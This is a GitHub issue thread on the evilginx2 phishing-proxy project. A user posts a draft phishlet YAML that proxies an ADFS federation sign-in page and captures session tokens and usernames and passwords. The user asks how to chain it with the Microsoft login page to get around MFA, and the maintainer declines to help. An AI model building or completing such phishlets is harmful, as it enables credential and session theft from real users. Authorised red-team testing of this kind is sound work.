### ISSUE TITLE
Phishlets for Sts federated office 365 domain without mfa

### ISSUE THREAD

**Issue by frdaz** [kgretzky/evilginx2#75]
Wonderful work many thx

I trying to create a sts.yaml file to test my federated domain directly with **https://sts.mydomain.com/adfs/ls/idpinitiatedsignon.aspx**
On my account Office 365 MFA is enabled, but as i log directly on STS, the MFA not started, MFA start when you log on login.microsoftonline.com then with a federer domain you are redirected to your federation (sts)

I must be completed the YAML to conbinated login.microsoftonline.com and sts.mydomain.com, if it's possible. 

**My sts.yaml (captured with fiddler)**
`name: 'sts'
author: '@fdaz'
min_ver: '2.1.0'
proxy_hosts:
  - {phish_sub: 'sts', orig_sub: 'sts', domain: 'mydomain.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'sts.mydomain.com', sub: 'sts', domain: 'mydomain.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'sts.mydomain.com', sub: 'sts', domain: 'mydomain.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'sts.mydomain.com'
    keys: ['MSISSamlRequest','MSISAuth']
user_regex:
  key: 'UserName'
  re: '(.*)'
pass_regex:
  key: 'Password'
  re: '(.*)'
landing_path:
  - '/adfs/ls/IdpInitiatedsignon.aspx'`

**Comment by kgretzky** [comment]
Hey. Sorry, it is too hard to help without trying to make that phishlet from scratch myself.
